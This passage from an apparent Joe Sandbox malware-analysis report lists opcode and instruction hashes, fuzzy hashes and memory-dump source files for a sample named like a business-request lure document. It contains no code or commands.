                                                                                                                                                    • Instruction Fuzzy Hash: 1B1149728002099FDB10CF9AC844BEEFFF5EF88324F248819D458A7254C778AA54DBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 41ea1a1b7c0a829d88abec49bfdcba9a1190c055b66dcdaa3c73ebfc669c7086
                                                                                                                                                    • Instruction ID: 6a95988be5b3cac844dcdb08c91fb16097c2ccf06972860aae3fab9ab1389d0f
                                                                                                                                                    • Opcode Fuzzy Hash: 41ea1a1b7c0a829d88abec49bfdcba9a1190c055b66dcdaa3c73ebfc669c7086
                                                                                                                                                    • Instruction Fuzzy Hash: 9C01C4B1A043008FDB049F55D84579A7BA6FFC8300F24C879D54D9F385DBB1D9468BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1cdef296b33bcbf4f8fe31f728af040b19eb98b5b44402a67574b7548099976a
                                                                                                                                                    • Instruction ID: 921bdf2be85d7242d5b8c22ba43ae3913254b5e4bd0bebaf5f01ca4876448f63
                                                                                                                                                    • Opcode Fuzzy Hash: 1cdef296b33bcbf4f8fe31f728af040b19eb98b5b44402a67574b7548099976a
                                                                                                                                                    • Instruction Fuzzy Hash: 00F0925218F3D22FC70387B56C754C5BFB4AD5322131A4ADBD9C8CA4A3C65C099BD762
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8106f21d59d22defb8b969efe9e3c0247b3237578f0fbff8a5b67521584fe30d
                                                                                                                                                    • Instruction ID: c410c9e71b6dc95e327fc1219067d47051ff61b4891aa04598e1fbb98bc238b7
                                                                                                                                                    • Opcode Fuzzy Hash: 8106f21d59d22defb8b969efe9e3c0247b3237578f0fbff8a5b67521584fe30d
                                                                                                                                                    • Instruction Fuzzy Hash: 140192336042686FD758DA99D040BEBFFEAEB55321F2481ABE484C7391D631EE80C750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2160290d21683ada9ecdcf339b9d585893475c71197d7692bfb2422d7a631c4a
                                                                                                                                                    • Instruction ID: c90581a1c86158b1b03e079f72f40e45a242a7d81e4693ac32c8079d9af08a1a
                                                                                                                                                    • Opcode Fuzzy Hash: 2160290d21683ada9ecdcf339b9d585893475c71197d7692bfb2422d7a631c4a
                                                                                                                                                    • Instruction Fuzzy Hash: AB01B531704A158BE3149A5AAC45B6BF2E7EFC8716F248036E20D87394EB71BC428690
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 868ff082336fca73c1370dd0bbedab38123ed9a1152cf25b090a9fc71643aba2
                                                                                                                                                    • Instruction ID: d1c4019c7bf5ebc521efaf166917fee11b0b2a0e355f0cf6b3325b14a1948c34
                                                                                                                                                    • Opcode Fuzzy Hash: 868ff082336fca73c1370dd0bbedab38123ed9a1152cf25b090a9fc71643aba2
                                                                                                                                                    • Instruction Fuzzy Hash: C0018436340215AFDB148F59DC94FABBBAAEFD9721F10802AFA04CB290C6B1D9059750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3ed4bf4cffde7e313681c8a59ee20f074be2d27a9350b40a196ba1178dd48b75
                                                                                                                                                    • Instruction ID: 6a3a212ccb8d195dfb29047baa05b9d3d66b132b283c8640058077541abd86e3
                                                                                                                                                    • Opcode Fuzzy Hash: 3ed4bf4cffde7e313681c8a59ee20f074be2d27a9350b40a196ba1178dd48b75
                                                                                                                                                    • Instruction Fuzzy Hash: A4116A30A00629CBEB20DB10C950BFEB7B2AF58700F6041DADA49A7751DBB49E81DF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 52f8b9bc3472d4999fd06ae11121af02ed774c7f6b4579f96ce5694ea4a228b8
                                                                                                                                                    • Instruction ID: fa287950f011218b4eec8b303e36028a934bbcaa8f50b9ebd8bc7086fc65a172
                                                                                                                                                    • Opcode Fuzzy Hash: 52f8b9bc3472d4999fd06ae11121af02ed774c7f6b4579f96ce5694ea4a228b8
                                                                                                                                                    • Instruction Fuzzy Hash: 4A112174B0A104DFC714DF94E144BBDB7B3AB88300F698156E8059B355CB34ED86DB86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8a6240d61307e65c016b8dc3241ef748481be19a98eb6def4312b4f7e2e029a7
                                                                                                                                                    • Instruction ID: 85d5cf9d57286f00dd17a3bdeba92e1f2db68b2889303720931f029e9bce5fa0
                                                                                                                                                    • Opcode Fuzzy Hash: 8a6240d61307e65c016b8dc3241ef748481be19a98eb6def4312b4f7e2e029a7
                                                                                                                                                    • Instruction Fuzzy Hash: 430162353002005FD710EF5DD854A2ABBF6EF8D361714846AE989CB751DB35EC01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2b3741fd6fa5e093c2ff7f3cd0744d775341742e4923fc0aad3fd8f0f2bc33fb
                                                                                                                                                    • Instruction ID: b2f6323cd601c31af30aaaaee2a6386d98f0078b7f6bda14db760992bc0fba60
                                                                                                                                                    • Opcode Fuzzy Hash: 2b3741fd6fa5e093c2ff7f3cd0744d775341742e4923fc0aad3fd8f0f2bc33fb
                                                                                                                                                    • Instruction Fuzzy Hash: 6A01D635608204AFD7018B58D850BEA7BA6EB98375F088066FC0C9B391C635DD41CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d3f2f60c2573f0baef389296c7d4098c02860154f6d2f09c8595cfd0f129505
                                                                                                                                                    • Instruction ID: 5897e8b0d3bcabbe0c4f92faad0d802659d603dac8dbc30194fe9c78e5ff058c
                                                                                                                                                    • Opcode Fuzzy Hash: 4d3f2f60c2573f0baef389296c7d4098c02860154f6d2f09c8595cfd0f129505
                                                                                                                                                    • Instruction Fuzzy Hash: EF115A30A01116CFEB258F25DC18BED7BB2AB88305F18825AD81AD3761CB359AC1CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 81eb84a22fc231dc9f680dc09aa9758cf601dc2d61e456ce31ce20695e7e013d
                                                                                                                                                    • Instruction ID: 484a53e4822ec3d665d46cb252ddb0b5b0bdb181a240a1b4b473695cd4fbd365
                                                                                                                                                    • Opcode Fuzzy Hash: 81eb84a22fc231dc9f680dc09aa9758cf601dc2d61e456ce31ce20695e7e013d
                                                                                                                                                    • Instruction Fuzzy Hash: 2A115E71940229CFCB28DB98C945BEA7BB7EF4D310F154286E509AB3A1C7709D41DF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b4c470bbfce3066abd1f527bbc7ef41a8b6371355b1cc88ffe3421d33bf61069
                                                                                                                                                    • Instruction ID: c4ee3926de8191689441459e1b563ba5f235b419bcbfab39ce5376b8e8c3e4fa
                                                                                                                                                    • Opcode Fuzzy Hash: b4c470bbfce3066abd1f527bbc7ef41a8b6371355b1cc88ffe3421d33bf61069
                                                                                                                                                    • Instruction Fuzzy Hash: FB017131600214DBDB255F65C8186EEBBF7EF8D711F14846AE802A7390CF754E46DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e71fe4537f4f21380a9404a45d29d6e10dde87e46f7799274068f8bb134ffd4c
                                                                                                                                                    • Instruction ID: c9c461a6830a448bab3e31a6c2501fec3fe8774c7a21ad514a7b8ac78a7106b6
                                                                                                                                                    • Opcode Fuzzy Hash: e71fe4537f4f21380a9404a45d29d6e10dde87e46f7799274068f8bb134ffd4c
                                                                                                                                                    • Instruction Fuzzy Hash: 1BF06D6138E3D14FC7164A687C704A9AFB5DF87A2079A45FBE884CB2A3C5584C4A8362
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7b745b6274a6ff20288b663d4b576dd3683903590d6dff12071188318d81de80
                                                                                                                                                    • Instruction ID: 4ef093eeb1482083b8c464fb54fe3a6f84fe91ffc0d97911c4662d7a335501fa
                                                                                                                                                    • Opcode Fuzzy Hash: 7b745b6274a6ff20288b663d4b576dd3683903590d6dff12071188318d81de80
                                                                                                                                                    • Instruction Fuzzy Hash: 8B01B1353056108FC31A9B64E828A6E7BA2AF8A311F10856BE546CB3E1CF35DC42CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c3b736f30b4bce88ea29b56f37ca3b88ffa45e837fd9f0ecb31cb8abcdc07be
                                                                                                                                                    • Instruction ID: 9ba61bdc6c58a5bd94f180a638e199c4444962494d21e40791abd1e0a25a0968
                                                                                                                                                    • Opcode Fuzzy Hash: 4c3b736f30b4bce88ea29b56f37ca3b88ffa45e837fd9f0ecb31cb8abcdc07be
                                                                                                                                                    • Instruction Fuzzy Hash: 5F115E70A0A204DFD708DF94D044BFDB7B3AB84301F698295D8015B35ACB34EE86DB86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e7cece38e4944c75c31ac16669f83010e7e89a85e6a0c7074d9cd619fa7389c4
                                                                                                                                                    • Instruction ID: 6209d7b79161f17cb6207b07579c6a9863fe153a20e001800c1910c4bd657d43
                                                                                                                                                    • Opcode Fuzzy Hash: e7cece38e4944c75c31ac16669f83010e7e89a85e6a0c7074d9cd619fa7389c4
                                                                                                                                                    • Instruction Fuzzy Hash: 2EF0C8713400124FC714DB19D490AAAF7D7FFC9610B24807AE705CB3A6CE35DC029790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7880ae954314fc80c1b0cc7e3c9142d5d8a231d4db6bf41a4b2e087ab88e49da
                                                                                                                                                    • Instruction ID: 50685efad1ff442e26a47a7a03e7b927110f62a0867ed46f32e7beffb545e1f6
                                                                                                                                                    • Opcode Fuzzy Hash: 7880ae954314fc80c1b0cc7e3c9142d5d8a231d4db6bf41a4b2e087ab88e49da
                                                                                                                                                    • Instruction Fuzzy Hash: 37F0CD31B4D3515FE31587245824767BFA59F87310F1981A6D549DF3E2C665DC41C390
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: acd6629b48d2910df74dd972d38541b96711fefdd8192d4bb5db7998541ffc48
                                                                                                                                                    • Instruction ID: 966f1258b521af4b9e06c8c35eaa44247f8f3fa5f753ea25827c574dd8f2f548
                                                                                                                                                    • Opcode Fuzzy Hash: acd6629b48d2910df74dd972d38541b96711fefdd8192d4bb5db7998541ffc48
                                                                                                                                                    • Instruction Fuzzy Hash: F6F046327001086FCB188B68D8D49EAF7AAEF88330F00812AF904C73A1CB749D07C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c0473d3c844f804b839423816decf1067c921af12c9367247b7a128ae4beb43
                                                                                                                                                    • Instruction ID: a4b7c9be53a661f939488120bfab6d16da403989ebea1d0ee8774d41d0f836ab
                                                                                                                                                    • Opcode Fuzzy Hash: 4c0473d3c844f804b839423816decf1067c921af12c9367247b7a128ae4beb43
                                                                                                                                                    • Instruction Fuzzy Hash: 34F0B4313001158B8B59B779545852E76E6DBD9660328043BF10BCF391DD29CC028392
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 305cdcddae98c14190519deefccf18162a17bc3f7e410aee1a7533098c99454c
                                                                                                                                                    • Instruction ID: d173f1fed81690c2b729dc2a3a3e6e578ea8c91a21eebb19f0736bb26b72b558
                                                                                                                                                    • Opcode Fuzzy Hash: 305cdcddae98c14190519deefccf18162a17bc3f7e410aee1a7533098c99454c
                                                                                                                                                    • Instruction Fuzzy Hash: 1D112A38E043248FCB51DF59D8487EAB7B1EB89300F4081EAD84EA7355DA346E84DF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 757e291cabc9e78250b64c429f98e460d9bb9c2d1532522a621bedddb928ad4d
                                                                                                                                                    • Instruction ID: 3710c4299781a541f7d05a4cb05cd5eb6db4ed2e0424ee8bedcc353f78db9856
                                                                                                                                                    • Opcode Fuzzy Hash: 757e291cabc9e78250b64c429f98e460d9bb9c2d1532522a621bedddb928ad4d
                                                                                                                                                    • Instruction Fuzzy Hash: 0601407070A244DFD714DF94E0447FDB7B3AB84305F688155D8055B359C778EE869B82
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d5bb3ff8042447cf20cee7739308b87b0df1895ea70620f32447d132500cdb6
                                                                                                                                                    • Instruction ID: 120a11dddc0df45e9469a1689f7d34da2ff806a9073663b41d05570a698b3add
                                                                                                                                                    • Opcode Fuzzy Hash: 2d5bb3ff8042447cf20cee7739308b87b0df1895ea70620f32447d132500cdb6
                                                                                                                                                    • Instruction Fuzzy Hash: 65F0C2303000118FC714DA19D890A6AF7D7FFC8610B248075E70ACB366CE21EC0197D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 98b730e566daa88f1b17be5d19090b297bce09dc9aa4d2d9077ab5f0e4d22a84
                                                                                                                                                    • Instruction ID: 607c13d7cb027933a5bb6799d815c752b4c6f6b73b891e8ced6c6504914d4063
                                                                                                                                                    • Opcode Fuzzy Hash: 98b730e566daa88f1b17be5d19090b297bce09dc9aa4d2d9077ab5f0e4d22a84
                                                                                                                                                    • Instruction Fuzzy Hash: 1D11A279A41219CFCB14CF68D884AA9F7B5FB48301F1581E6E819A7356C731ED41CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c45b37f266f60daa4325ee7d6e557620eb4ab587769969d0f7694cf7a6d8968
                                                                                                                                                    • Instruction ID: 6db2cdabdfed284bd09124fcf67df595441c22460f7776f30d4241b1bc84fe6a
                                                                                                                                                    • Opcode Fuzzy Hash: 4c45b37f266f60daa4325ee7d6e557620eb4ab587769969d0f7694cf7a6d8968
                                                                                                                                                    • Instruction Fuzzy Hash: F711FA34A042248FCB64EF65D8447EEB7B1EF89314F1484E9D809A7395DB34AE85CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 81941f830d397bcc06daa88aceb2607bc0d5987aa6d10f435558fb9248de74c0
                                                                                                                                                    • Instruction ID: 558a7923aa96e473b768e5b4dfdadfe8883641a85141fb5240fb92d9d67fbcb9
                                                                                                                                                    • Opcode Fuzzy Hash: 81941f830d397bcc06daa88aceb2607bc0d5987aa6d10f435558fb9248de74c0
                                                                                                                                                    • Instruction Fuzzy Hash: 84012835E006199FCB00DFA9D5049DEBBF5EF89711F108569E519A3320EB30AA49CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b19cdb883980304d4a2e24d1429128e597db8d40c45581a4f1a9a7f65d6cc2af
                                                                                                                                                    • Instruction ID: 21b32f9bd3ffd079be0580bf04069ba1ae15b1989dfde267f008a97506bcd7df
                                                                                                                                                    • Opcode Fuzzy Hash: b19cdb883980304d4a2e24d1429128e597db8d40c45581a4f1a9a7f65d6cc2af
                                                                                                                                                    • Instruction Fuzzy Hash: D20131353016209FC3199B65D814A2EB7E2EBCD711B10852AE90A877E4CF31ED42CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1347322145bceeabae8d38b7f06dacbca82c7ca0252b883ea5360b941d28558d
                                                                                                                                                    • Instruction ID: a7110a2da30a4c2b3ca2f882e91525a1367571d1c16d7d0a67be6ddd948138a1
                                                                                                                                                    • Opcode Fuzzy Hash: 1347322145bceeabae8d38b7f06dacbca82c7ca0252b883ea5360b941d28558d
                                                                                                                                                    • Instruction Fuzzy Hash: E1F028313402845FC716DB18E8849AE7FA2AFC4310B044429ED098B762D671DC89C750
                                                                                                                                                    Uniqueness

